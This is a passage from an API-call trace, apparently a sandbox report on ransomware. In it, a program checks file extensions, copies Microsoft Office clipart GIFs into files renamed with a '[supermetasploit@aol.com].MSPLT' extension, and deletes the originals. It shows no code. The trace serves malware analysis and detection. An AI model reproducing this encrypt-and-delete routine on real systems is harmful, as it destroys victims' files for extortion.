(lpString1=".1cd", lpString2=".GIF") returned -1 [0186.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0186.247] lstrlenW (lpString=".jpg") returned 4 [0186.247] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0186.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0186.247] lstrlenW (lpString=".doc") returned 4 [0186.247] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.247] lstrlenW (lpString=".docx") returned 5 [0186.247] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.247] lstrlenW (lpString=".pdf") returned 4 [0186.247] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.248] lstrlenW (lpString=".xls") returned 4 [0186.248] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.248] lstrlenW (lpString=".xlsx") returned 5 [0186.248] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.248] lstrlenW (lpString=".ppt") returned 4 [0186.248] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0186.248] lstrlenW (lpString=".zip") returned 4 [0186.248] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.248] lstrlenW (lpString=".rar") returned 4 [0186.248] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.248] lstrlenW (lpString=".bz2") returned 4 [0186.248] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.248] lstrlenW (lpString=".7z") returned 3 [0186.248] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0186.248] lstrlenW (lpString=".dbf") returned 4 [0186.248] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0186.248] lstrlenW (lpString=".1cd") returned 4 [0186.248] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 68 [0186.248] lstrlenW (lpString=".jpg") returned 4 [0186.248] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.248] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0186.249] lstrlenW (lpString="AG00142_.GIF") returned 12 [0186.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0186.270] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=15308) returned 1 [0186.270] CloseHandle (hObject=0x358) returned 1 [0186.270] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif")) returned 0x220 [0186.270] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0186.271] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0186.271] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0186.271] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0186.271] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0186.277] GetLastError () returned 0x0 [0186.277] ReadFile (in: hFile=0x358, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x3bcc, lpOverlapped=0x0) returned 1 [0186.316] WriteFile (in: hFile=0x368, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x3bd0, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x3bd0, lpOverlapped=0x0) returned 1 [0186.317] ReadFile (in: hFile=0x358, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0186.318] WriteFile (in: hFile=0x368, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xec, lpOverlapped=0x0) returned 1 [0186.318] SetEndOfFile (hFile=0x368) returned 1 [0186.372] CloseHandle (hObject=0x368) returned 1 [0186.411] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0186.411] SetEndOfFile (hFile=0x358) returned 1 [0186.413] CloseHandle (hObject=0x358) returned 1 [0186.413] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0186.413] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif")) returned 1 [0186.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0186.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0186.414] lstrlenW (lpString=".doc") returned 4 [0186.414] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.414] lstrlenW (lpString=".docx") returned 5 [0186.414] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.414] lstrlenW (lpString=".pdf") returned 4 [0186.414] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.414] lstrlenW (lpString=".xls") returned 4 [0186.414] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.414] lstrlenW (lpString=".xlsx") returned 5 [0186.414] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.414] lstrlenW (lpString=".ppt") returned 4 [0186.414] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0186.414] lstrlenW (lpString=".zip") returned 4 [0186.414] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.414] lstrlenW (lpString=".rar") returned 4 [0186.414] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.414] lstrlenW (lpString=".bz2") returned 4 [0186.414] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.414] lstrlenW (lpString=".7z") returned 3 [0186.414] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0186.414] lstrlenW (lpString=".dbf") returned 4 [0186.415] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0186.415] lstrlenW (lpString=".1cd") returned 4 [0186.415] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0186.415] lstrlenW (lpString=".jpg") returned 4 [0186.415] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0186.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0186.415] lstrlenW (lpString=".doc") returned 4 [0186.415] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.415] lstrlenW (lpString=".docx") returned 5 [0186.415] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.415] lstrlenW (lpString=".pdf") returned 4 [0186.415] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.415] lstrlenW (lpString=".xls") returned 4 [0186.415] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.415] lstrlenW (lpString=".xlsx") returned 5 [0186.415] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.415] lstrlenW (lpString=".ppt") returned 4 [0186.415] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0186.415] lstrlenW (lpString=".zip") returned 4 [0186.415] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.415] lstrlenW (lpString=".rar") returned 4 [0186.415] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.415] lstrlenW (lpString=".bz2") returned 4 [0186.416] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.416] lstrlenW (lpString=".7z") returned 3 [0186.416] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0186.416] lstrlenW (lpString=".dbf") returned 4 [0186.416] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0186.416] lstrlenW (lpString=".1cd") returned 4 [0186.416] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 68 [0186.416] lstrlenW (lpString=".jpg") returned 4 [0186.416] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.416] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0186.416] lstrlenW (lpString="AG00157_.GIF") returned 12 [0186.416] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0186.430] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=4955) returned 1 [0186.430] CloseHandle (hObject=0x38c) returned 1 [0186.430] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif")) returned 0x220 [0186.430] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0186.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0186.431] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0186.431] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0186.431] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0186.432] GetLastError () returned 0x0 [0186.432] ReadFile (in: hFile=0x38c, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x135b, lpOverlapped=0x0) returned 1 [0186.477] WriteFile (in: hFile=0x37c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x1360, lpOverlapped=0x0) returned 1 [0186.479] ReadFile (in: hFile=0x38c, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0186.479] WriteFile (in: hFile=0x37c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xec, lpOverlapped=0x0) returned 1 [0186.479] SetEndOfFile (hFile=0x37c) returned 1 [0186.479] CloseHandle (hObject=0x37c) returned 1 [0186.481] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0186.481] SetEndOfFile (hFile=0x38c) returned 1 [0186.482] CloseHandle (hObject=0x38c) returned 1 [0186.482] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0186.482] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif")) returned 1 [0186.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0186.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0186.483] lstrlenW (lpString=".doc") returned 4 [0186.483] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.483] lstrlenW (lpString=".docx") returned 5 [0186.483] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.483] lstrlenW (lpString=".pdf") returned 4 [0186.483] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.483] lstrlenW (lpString=".xls") returned 4 [0186.483] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.483] lstrlenW (lpString=".xlsx") returned 5 [0186.483] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.483] lstrlenW (lpString=".ppt") returned 4 [0186.483] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0186.483] lstrlenW (lpString=".zip") returned 4 [0186.483] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.483] lstrlenW (lpString=".rar") returned 4 [0186.483] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.483] lstrlenW (lpString=".bz2") returned 4 [0186.484] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.484] lstrlenW (lpString=".7z") returned 3 [0186.484] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0186.484] lstrlenW (lpString=".dbf") returned 4 [0186.484] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0186.484] lstrlenW (lpString=".1cd") returned 4 [0186.484] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0186.484] lstrlenW (lpString=".jpg") returned 4 [0186.484] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0186.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0186.484] lstrlenW (lpString=".doc") returned 4 [0186.484] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.484] lstrlenW (lpString=".docx") returned 5 [0186.484] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.484] lstrlenW (lpString=".pdf") returned 4 [0186.484] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.484] lstrlenW (lpString=".xls") returned 4 [0186.484] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.484] lstrlenW (lpString=".xlsx") returned 5 [0186.484] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.484] lstrlenW (lpString=".ppt") returned 4 [0186.484] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0186.484] lstrlenW (lpString=".zip") returned 4 [0186.485] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.485] lstrlenW (lpString=".rar") returned 4 [0186.485] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.485] lstrlenW (lpString=".bz2") returned 4 [0186.485] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.485] lstrlenW (lpString=".7z") returned 3 [0186.485] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0186.485] lstrlenW (lpString=".dbf") returned 4 [0186.485] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0186.485] lstrlenW (lpString=".1cd") returned 4 [0186.485] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 68 [0186.485] lstrlenW (lpString=".jpg") returned 4 [0186.485] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.485] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0186.485] lstrlenW (lpString="AG00163_.GIF") returned 12 [0186.485] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0186.486] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=6984) returned 1 [0186.486] CloseHandle (hObject=0x38c) returned 1 [0186.486] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif")) returned 0x220 [0186.486] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0186.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0186.486] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0186.486] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0186.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0186.487] GetLastError () returned 0x0 [0186.487] ReadFile (in: hFile=0x38c, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x1b48, lpOverlapped=0x0) returned 1 [0186.534] WriteFile (in: hFile=0x37c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x1b50, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x1b50, lpOverlapped=0x0) returned 1 [0186.537] ReadFile (in: hFile=0x38c, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0186.538] WriteFile (in: hFile=0x37c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xec, lpOverlapped=0x0) returned 1 [0186.538] SetEndOfFile (hFile=0x37c) returned 1 [0186.538] CloseHandle (hObject=0x37c) returned 1 [0186.542] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0186.542] SetEndOfFile (hFile=0x38c) returned 1 [0186.543] CloseHandle (hObject=0x38c) returned 1 [0186.543] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0186.544] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00163_.gif")) returned 1 [0186.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0186.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0186.544] lstrlenW (lpString=".doc") returned 4 [0186.544] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.544] lstrlenW (lpString=".docx") returned 5 [0186.544] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.544] lstrlenW (lpString=".pdf") returned 4 [0186.544] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.544] lstrlenW (lpString=".xls") returned 4 [0186.544] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.544] lstrlenW (lpString=".xlsx") returned 5 [0186.544] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.544] lstrlenW (lpString=".ppt") returned 4 [0186.544] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0186.545] lstrlenW (lpString=".zip") returned 4 [0186.545] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.545] lstrlenW (lpString=".rar") returned 4 [0186.545] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.545] lstrlenW (lpString=".bz2") returned 4 [0186.545] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.545] lstrlenW (lpString=".7z") returned 3 [0186.545] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0186.545] lstrlenW (lpString=".dbf") returned 4 [0186.545] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0186.545] lstrlenW (lpString=".1cd") returned 4 [0186.545] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0186.545] lstrlenW (lpString=".jpg") returned 4 [0186.545] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 68 [0186.545] lstrlenW (lpString="C:\\Program Files\\Microsoft 